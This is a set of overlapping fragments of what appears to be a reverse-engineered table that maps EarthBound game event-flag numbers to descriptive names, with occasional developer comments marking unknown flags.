'SENTRY_ROBOT_6_DEFEATED', 363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED', 365: 'SHARK_AT_ARCADE_ABSENT',", "'GUARDIAN_HIEROGLYPH_13_DEFEATED', 403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED', 404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED', 405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED', 406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED', 407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED',", "23: 'TONY_JOINS', 24: 'DUNGEON_MAN_JOINS', 25: 'FLYING_MAN_1_JOINS', 26: 'FLYING_MAN_2_JOINS', 27: 'FLYING_MAN_3_JOINS', 28: 'FLYING_MAN_4_JOINS', 29:", "'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2', 459: 'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG', 462: 'MONKEY_CAVE_RULER', 463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY',", "'HEALER_PURIFY', 178: 'HEALER_RESTORE_FEELING', 179: 'LARGE_PIZZA_DELIVERY', 180: 'PIZZA_DELIVERY', 181: 'ESCARGO_EXPRESS_DELIVERY', 182: 'GOT_MELODY_GIANT_STEP', 183: 'GOT_MELODY_LILLIPUT_STEPS',", "kidnapping) 322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME', 323: 'GOT_PAK_OF_BUBBLE_GUM', 324: 'SHOP_RED_SNAKE', 325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT', 326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT',", "358: 'SENTRY_ROBOT_2_DEFEATED', 359: 'SENTRY_ROBOT_3_DEFEATED', 360: 'SENTRY_ROBOT_4_DEFEATED', 361: 'SENTRY_ROBOT_5_DEFEATED', 362: 'SENTRY_ROBOT_6_DEFEATED', 363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364:", "268: 'SHOP_SUMMERS_GELATO', 269: 'SHOP_MAGIC_CAKE_LADY', 270: 'SHOP_DALAAM_RESTAURANT', 271: 'SHOP_SCARABA_HASSANS_SHOP', 272: 'DIAMOND_TO_BE_DELIVERED', 273: 'MU_TRAINING_COMPLETE', 274:", "Cleared when you defeat Mr. Carpainter) 176: 'HEALER_SOFTEN', 177: 'HEALER_PURIFY', 178: 'HEALER_RESTORE_FEELING', 179:", "'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY', # 370 (Unknown. Related to traffic jam?) #", "'TALKED_TO_TENDA_CHIEF', 155: 'TENDAS_NOT_SHY', # 156 (???) # 157 (???) # 158 (???) 159:", "doesn't actually save your game. WHAT?) 805: 'PRESENT_CRACKED_BAT', 829: 'PRESENT_TONY_COOKIE_1', 830: 'PRESENT_TONY_COOKIE_2', 831:", "338: 'NEAR_WINTERS_ROPE', 339: 'APPLE_KID_NOT_AT_HIS_HOUSE', # 340 (???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY',", "about Runaway Five Tour Bus???) 748: 'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS', 750: 'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT',", "# 589 (Visibility flag for some Hotel Attendant?) 590: 'HAPPY_THREED_PEOPLE', 591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', #", "580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP', 581: 'HIDE_SCARABA_SHOP_TOWN_MAP', 582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP', 583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP', 585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586:", "56 (Unknown) 57: 'FOURSIDE_DEPT_BLACKOUT', 58: 'FOURSIDE_SEWERS_OPEN', 59: 'ELECTRA_OUTSIDE_BUILDING', 60: 'EVERDRED_OUTSIDE_CAFE', 61: 'MAGIC_CAKE_LADY_IDENTIFIED', 62:", "579: 'HIDE_SCARABA_HOTEL_TOWN_MAP', 580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP', 581: 'HIDE_SCARABA_SHOP_TOWN_MAP', 582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP', 583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP', 585:", "'GUARDIAN_MOLE_2_DEFEATED', 279: 'GUARDIAN_MOLE_3_DEFEATED', 280: 'GUARDIAN_MOLE_4_DEFEATED', 281: 'GUARDIAN_MOLE_5_DEFEATED', # 282 (Five moles defeated? How", "Related to desert mine?) 608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609: 'WINTERS_PENCIL_ERASED', 610: 'DETECTIVE_IN_THREED', # 611 (Something", "for some Hotel Attendant?) 590: 'HAPPY_THREED_PEOPLE', 591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 592: 'MONKEY_OUTSIDE_JACKIES_CAFE',", "89: 'GOT_SHYNESS_BOOK', 90: 'GOT_DIAMOND', 91: 'GOT_SIGNED_BANANA', 92: 'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP', 94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95:", "286 (???) # 287 (Something about Lake Tess color palette) 288: 'USED_HAWK_EYE', 289:", "'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP',", "192: 'CONQUERED_SANCTUARY_4', 193: 'CONQUERED_SANCTUARY_3', 194: 'CONQUERED_SANCTUARY_5', 195: 'CONQUERED_SANCTUARY_6', 196: 'CONQUERED_SANCTUARY_7', 197: 'CONQUERED_SANCTUARY_8', #", "649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE', 650: 'GOT_MONKEYS_LOVE', 651: 'UNDERWORLD_TENDA_GATE_OPEN', 652: 'USED_CARROT_KEY', 653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER', 654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE', 655:", "from Dad?) 776: 'PAULA_AT_MONOTOLI_BUILDING', 777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA', 778: 'EXIT_MOUSE_ASLEEP', # 779 (Related to PREVENT_TELEPORT?)", "'LIER_INSIDE_HOUSE', 32: 'LIER_INSIDE_CAVE_1', 33: 'LIER_INSIDE_CAVE_2', 34: 'PICKY_AT_HIS_ROOM', 35: 'POKEY_AT_HIS_ROOM', 36: 'COP_AT_ENTERTAINERS_SHACK', 37: 'ALOYSIUS_AT_HOME',", "'MONKEY_CAVE_FRESH_EGG', 462: 'MONKEY_CAVE_RULER', 463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464: 'GOT_KING_BANANA', # 465 (???) 466: 'PICKY_SLEEPING_AT_METEORITE', #", "'GUARDIAN_HIEROGLYPH_8_DEFEATED', 398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED', 399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED', 400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED', 401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED', 402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED', 403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED',", "acknowledging the kidnapping) 322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME', 323: 'GOT_PAK_OF_BUBBLE_GUM', 324: 'SHOP_RED_SNAKE', 325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT', 326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER',", "632: 'MONSTERS_IN_ONETT', 633: 'LIERS_HOUSE_UNLOCKED', 634: 'PAULA_TELEPATHY_DREAM_1', 635: 'PAULA_TELEPATHY_DREAM_2', 636: 'PAULA_TELEPATHY_DREAM_JEFF', 637: 'POO_AT_HIS_PALACE', 638:", "'LIER_INSIDE_CAVE_2', 34: 'PICKY_AT_HIS_ROOM', 35: 'POKEY_AT_HIS_ROOM', 36: 'COP_AT_ENTERTAINERS_SHACK', 37: 'ALOYSIUS_AT_HOME', 38: 'FIVE_COPS_AT_POLICE_STATION', 39: 'COP_AT_STATION_ENTRANCE',", "410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416:", "606: 'DUNGEON_MAN_OPEN', # 607 (Unknown. Related to desert mine?) 608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609: 'WINTERS_PENCIL_ERASED',", "267: 'SHOP_TOTO_SHOP', 268: 'SHOP_SUMMERS_GELATO', 269: 'SHOP_MAGIC_CAKE_LADY', 270: 'SHOP_DALAAM_RESTAURANT', 271: 'SHOP_SCARABA_HASSANS_SHOP', 272: 'DIAMOND_TO_BE_DELIVERED', 273:", "'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP', 641: 'HIDE_THREED_TO_DESERT_TOWN_MAP', 642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP', 643: 'READY_TO_LOOK_AT_PHOTO_ALBUM', 644: 'GOT_SATURN_RIBBON', 645: 'ESCARGO_EXPRESS_PICK_UP', 646: 'FOR_SALE_SIGN_CUSTOMER_2',", "'USED_CARROT_KEY', 653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER', 654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE', 655: 'SKY_RUNNER_MUSIC', 656: 'ALT_BUY_SOUND_EFFECT', 657: 'BOUGHT_OR_SOLD_AT_SHOP', 658: 'BOUGHT_WEAPON',", "565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP', 566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP', 567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP', 568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP', 569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP', 570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571:", "'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED', 418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED', 419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED', 420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED', 421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED', 422: 'ONETT_DAYTIME',", "the Pencil Eraser. Cleared when you defeat Mr. Carpainter) 176: 'HEALER_SOFTEN', 177: 'HEALER_PURIFY',", "flags) # 229 (I hate multipurpose flags) # 230 (I hate multipurpose flags)", "continue yes/no on death. TODO: Investigate) 476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP', 477: 'NESS_SLEEPING_AT_HIS_BED', 478: 'SHOP_SCARABA_CONDIMENTS', 479:", "Hieroglyph Guardian doesn't reference this flag and never fights you 392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393:", "'GOT_PHOTO_SUMMERS_BEACH', 723: 'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID', 726: 'GOT_PHOTO_SCARABA_OASIS', 727: 'GOT_PHOTO_DEEP_DARKNESS', 728: 'GOT_PHOTO_TENDA_VILLAGE',", "92: 'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP', 94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME', 96: 'POKEY_WAITING_MOM_GOODBYE', 97: 'NESS_HOUSE_POKEY_MUSIC', 98:", "this differ from 72?) # 283 (???) 284: 'PEACEFUL_REST_PENCIL_ERASED', 285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT', # 286", "456: 'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2', 459: 'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG', 462:", "67: 'FOOD_STAND_MONITOR_DEFEATED', 68: 'CARPAINTER_DEFEATED', 69: 'BOOGEY_TENT_DEFEATED', 70: 'STARMAN_DX_DEFEATED', 71: 'MASTER_BELCH_DEFEATED', 72: 'MINE_MOLES_DEFEATED', 73:", "'GOT_MELODY_FIRE_SPRING', 190: 'CONQUERED_SANCTUARY_1', 191: 'CONQUERED_SANCTUARY_2', 192: 'CONQUERED_SANCTUARY_4', 193: 'CONQUERED_SANCTUARY_3', 194: 'CONQUERED_SANCTUARY_5', 195: 'CONQUERED_SANCTUARY_6',", "'TENDA_SHOP_PLAIN_ROLL_2', 427: 'TENDA_SHOP_SPICY_JERKY', 428: 'TENDA_SHOP_BAG_OF_DRAGONITE', 429: 'TENDA_SHOP_TALISMAN_COIN', 430: 'TENDA_SHOP_HALL_OF_FAME_BAT', # 431 (???) 432:", "'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662: 'DUNGEON_MAN_DESERT_MUSIC', 663: 'RETURNED_SHYNESS_BOOK', 664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT', 665: 'GOT_LETTER_FROM_MOM', 666: 'GOT_LETTER_FROM_TONY', 667: 'GOT_LETTER_FROM_KIDS',", "to Poo's journey) 151: 'QUEST_TO_SUBMARINE', 152: 'PYRAMID_DANCE_IN_PROGRESS', 153: 'TENDA_VILLAGE_UNDERGROUND_OPEN', 154: 'TALKED_TO_TENDA_CHIEF', 155: 'TENDAS_NOT_SHY',", "'INVISIBLE_MAN_JOINS', 166: 'MOONSIDE_COUNTDOWN_GUY_1', 167: 'MOONSIDE_COUNTDOWN_GUY_2', 168: 'MOONSIDE_COUNTDOWN_GUY_3', 169: 'PHASE_DISTORTER_V2_BEING_FINISHED', # 170 (???) 171:", "'DETECTIVE_IN_THREED', # 611 (Something about talking to Paula's dad and not talking to", "Five Tour Bus???) 748: 'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS', 750: 'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT',", "111: 'VISITED_PEACEFUL_REST_PENCIL', 112: 'INVESTED_IN_APPLE_KID', 113: 'STUBBY_LEGS', 114: 'TWOSON_DEPT_MAN', 115: 'CHAOS_THEATER_BACKSTAGE_OPEN', 116: 'ORANGE_KID_ALT_TEXT', 117:", "308: 'LIER_BY_MANI_MANI', 309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310: 'POKEY_WAITING_AT_COUCH', 311: 'WINTERS_ROPE_LOWERED', 312: 'GHOSTS_BLOCKING_THREED', # 313 (Unknown.", "395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED', 396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED', 397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED', 398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED', 399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED', 400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED', 401:", "88: 'GOT_BAD_KEY_MACHINE', 89: 'GOT_SHYNESS_BOOK', 90: 'GOT_DIAMOND', 91: 'GOT_SIGNED_BANANA', 92: 'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP', 94:", "202: 'GOT_MACH_PIZZA_PHONE', 203: 'GOT_STOIC_CLUB_PHONE', 204: 'FLYING_MAN_1_DEAD', 205: 'FLYING_MAN_2_DEAD', 206: 'FLYING_MAN_3_DEAD', 207: 'FLYING_MAN_4_DEAD', 208:", "flags) # 233 (I hate multipurpose flags) 234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN', 235: 'SHOP_BURGLIN_PARK_JAMAICAN', 236: 'SHOP_BURGLIN_PARK_BAKERY',", "'SHOP_MOONSIDE', 734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE', 735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER', 736: 'GOT_PAIR_OF_DIRTY_SOCKS', 737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES', 738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE', 739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL',", "483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE', 484: 'PHOTO_CHAOS_THEATER_AVAILABLE', 485: 'PHOTO_LAKE_TESS_AVAILABLE', 486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE', 487: 'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489:", "129: 'TESSIE_EMERGES', 130: 'TALKED_TO_ANDONUTS_2', 131: 'WATERFALL_WAIT_ENABLED', 132: 'QUEST_TO_ZEXONYTE', 133: 'PHASE_DISTORTER_V2_OPEN', 134: 'DELIVERED_ZEXONYTE', 135:", "765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS', 766: 'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE', # 769 (Checked when you", "'DAD_CALLING_HOME', 96: 'POKEY_WAITING_MOM_GOODBYE', 97: 'NESS_HOUSE_POKEY_MUSIC', 98: 'ANSWERED_DADS_CALL', 99: 'BOUGHT_SCAM_HOUSE', 100: 'KING_WONT_JOIN', 101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI',", "'BOUGHT_SCAM_HOUSE', 100: 'KING_WONT_JOIN', 101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI', 102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK', 103: 'LIBRARY_BATHROOM_MAN', # Referenced in unused", "317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM', 319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER', # 320 (???) # 321 (Something about", "246: 'SHOP_LAB_CAVE_BOY', 247: 'SHOP_GRAPEFRUIT_FALLS', 248: 'SHOP_SATURN_EQUIPMENT', 249: 'SHOP_SATURN_PENDANTS', 250: 'SHOP_SATURN_CONSUMABLES', 251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252:", "'VISITED_WINTERS', 213: 'VISITED_SATURN_VALLEY', 214: 'VISITED_FOURSIDE', 215: 'VISITED_SUMMERS', 216: 'VISITED_DALAAM', 217: 'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS',", "This is only set if you're near (0x02A0, 0x0D70) in a radius of", "hate multipurpose flags) # 228 (I hate multipurpose flags) # 229 (I hate", "room 297: 'ZOMBIE_CHICK_AT_HOTEL_2', # Second hotel room 298: 'ZOMBIE_CHICK_AT_HOTEL_3', # Third hotel room", "196: 'CONQUERED_SANCTUARY_7', 197: 'CONQUERED_SANCTUARY_8', # 198 (Unknown. Set when Paula joins) 199: 'GOT_DAD_PHONE',", "'CAN_ACCESS_48TH_MONOTILI_FLOOR', 143: 'FOURSIDE_FREE_FROM_MONOTOLI', # 144 (Related to Bulldozer at Fourside Bridge?) 145: 'TALKED_TO_DYING_EVERDRED',", "744: 'TALKED_TO_CARPAINTER', 745: 'QUEST_TO_YOGURT_MACHINE', 746: 'SCAM_HOUSE_UNLOCKED', # 747 (??? Something about Runaway Five", "'HIDE_SCARABA_HOTEL_TOWN_MAP', 580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP', 581: 'HIDE_SCARABA_SHOP_TOWN_MAP', 582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP', 583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP', 585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP',", "'TALKED_TO_MOONSIDE_SAILOR_MAN', # 775 (Can't get calls from Dad?) 776: 'PAULA_AT_MONOTOLI_BUILDING', 777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA', 778:", "'MONKEY_CAVE_PICNIC_LUNCH', 453: 'MONKEY_CAVE_WET_TOWEL', 454: 'MONKEY_CAVE_PIZZA_1', 455: 'MONKEY_CAVE_PROTEIN_DRINK', 456: 'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2',", "them might be responsible only for palette changes, maybe) 435: 'GUARDIAN_GENERAL_DEFEATED', 436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED',", "'HAS_CALLED_MOM_AFTER_RESCUING_PAULA', 690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER', 691: 'POO_LEFT_WITH_HAWK_EYE', 692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY',", "58: 'FOURSIDE_SEWERS_OPEN', 59: 'ELECTRA_OUTSIDE_BUILDING', 60: 'EVERDRED_OUTSIDE_CAFE', 61: 'MAGIC_CAKE_LADY_IDENTIFIED', 62: 'DUNGEON_MAN_IN_DESERT', 63: 'PATH_TO_MANI_MANI_OPEN', 64:", "# 232 (I hate multipurpose flags) # 233 (I hate multipurpose flags) 234:", "Starman DX defeated. One of them might be responsible only for palette changes,", "494: 'PHOTO_FOURSIDE_MUSEUM_OUTSIDE_AVAILABLE', 495: 'PHOTO_FOURSIDE_MUSEUM_INSIDE_AVAILABLE', 496: 'PHOTO_MONOTOLI_BUILDING_AVAILABLE', 497: 'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE', 498: 'PHOTO_POOS_PALACE_INSIDE_AVAILABLE', 499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE', 500:", "Apple Kid calls you about the Gourmet Yogurt Machine) # 377 (???) #", "'COP_AT_STATION_ENTRANCE', 40: 'SHARK_GUARDING_FRANK_DEFEATED', 41: 'CHAOS_THEATER_STAGE_UNBLOCKED', 42: 'APPLE_KID_IN_BURGLIN_PARK', 43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE', 44: 'POKEY_OUTSIDE_HH_HQ', 45: 'POKEY_OUTSIDE_PAULA_CABIN',", "but never set) 770: 'LAST_ESCARGO_EXPRESS_CALL', # 771 (???) 772: 'LAST_DAD_CALL', 773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', #", "222: 'UNUSED_REFRESHING_HERB', 223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224: 'SHOP_SOLD_OLD_EQUIPMENT', 225: 'SHOP_SOLD_ITEM', # 226 (I hate multipurpose", "'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED', 409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED',", "165: 'INVISIBLE_MAN_JOINS', 166: 'MOONSIDE_COUNTDOWN_GUY_1', 167: 'MOONSIDE_COUNTDOWN_GUY_2', 168: 'MOONSIDE_COUNTDOWN_GUY_3', 169: 'PHASE_DISTORTER_V2_BEING_FINISHED', # 170 (???)", "520: 'GUARDIAN_MOLE_TEXT_3', 521: 'GUARDIAN_MOLE_TEXT_4', # 522 (Multipurpose?) # 523 (Multipurpose?) 524: 'YOUR_SANCTUARY_MUSIC', #", "241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY', 245: 'SHOP_WINTERS_DRUGSTORE', 246: 'SHOP_LAB_CAVE_BOY', 247:", "258: 'SHOP_FOURSIDE_DEPT_BAKERY', 259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS', 260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261: 'SHOP_FOURSIDE_DEPT_BURGER', 262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER', 264:", "'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709: 'GOT_PHOTO_CIRCUS_TENT', 710: 'GOT_PHOTO_BLACK_SESAME_SEED', 711: 'GOT_PHOTO_DESERT_MINE', 712: 'GOT_PHOTO_FOURSIDE_BRIDGE', 713: 'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE', 714: 'GOT_PHOTO_FOURSIDE_MUSEUM_INSIDE',", "352: 'HH_HQ_CULTIST_2_DEFEATED', 353: 'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED', 355: 'HH_HQ_CULTIST_5_DEFEATED', 356: 'HH_HQ_CULTIST_6_DEFEATED', 357: 'SENTRY_ROBOT_1_DEFEATED', 358:", "'GOT_PHOTO_DEEP_DARKNESS', 728: 'GOT_PHOTO_TENDA_VILLAGE', 729: 'GOT_PHOTO_SATURN_VALLEY_FINAL', 730: 'TALKED_TO_ONETT_BAKERY_LADY_TWICE', 731: 'SHOP_UNDERWORLD_TENDA', 732: 'SHOP_MAGICANT', 733: 'SHOP_MOONSIDE',", "'CAPTIVES_AT_STONEHENGE', 53: 'TALKED_TO_BRICK_ROAD', # 54 (Montague at beginning of expanded mine?) # 55", "406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED', 407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED', 409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412:", "Fourside Bridge?) 145: 'TALKED_TO_DYING_EVERDRED', 146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', # 147 (Venus at Topolla?) 148: 'READ_HIEROGLYPHS',", "'SHOP_SUMMERS_RESTAURANT', 267: 'SHOP_TOTO_SHOP', 268: 'SHOP_SUMMERS_GELATO', 269: 'SHOP_MAGIC_CAKE_LADY', 270: 'SHOP_DALAAM_RESTAURANT', 271: 'SHOP_SCARABA_HASSANS_SHOP', 272: 'DIAMOND_TO_BE_DELIVERED',", "'DEBUG_SKIP_SANDWICH_DX', 433: 'ZOMBIE_CHICK_HOTEL_MUSIC', 434: 'STARMAN_DX_ABSENT', # (Another flag for Starman DX defeated. One", "'TENDA_SHOP_BAG_OF_DRAGONITE', 429: 'TENDA_SHOP_TALISMAN_COIN', 430: 'TENDA_SHOP_HALL_OF_FAME_BAT', # 431 (???) 432: 'DEBUG_SKIP_SANDWICH_DX', 433: 'ZOMBIE_CHICK_HOTEL_MUSIC', 434:", "647: 'FOR_SALE_SIGN_CUSTOMER_3', 648: 'FOR_SALE_SIGN_CUSTOMER_4', 649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE', 650: 'GOT_MONKEYS_LOVE', 651: 'UNDERWORLD_TENDA_GATE_OPEN', 652: 'USED_CARROT_KEY', 653:", "439: 'GOT_MAGIC_TRUFFLE_1', 440: 'GOT_MAGIC_TRUFFLE_2', 441: 'GOT_MAGIC_TRUFFLE_3', 442: 'GOT_MAGIC_TRUFFLE_4', 443: 'GOT_MAGIC_TRUFFLE_5', 444: 'KING_JOINS', 445:", "'LAST_MELODY_AT_LILLIPUT_STEPS', 546: 'LAST_MELODY_AT_MILKY_WELL', 547: 'LAST_MELODY_AT_PINK_CLOUD', 548: 'LAST_MELODY_AT_FIRE_SPRING', 549: 'QUEUE_OUTSIDE_CHAOS_THEATER', 550: 'GOT_SUPORMA', 551: 'GAVE_FOOD_TO_APPLE_KID',", "'FLYING_MAN_1_JOINS', 26: 'FLYING_MAN_2_JOINS', 27: 'FLYING_MAN_3_JOINS', 28: 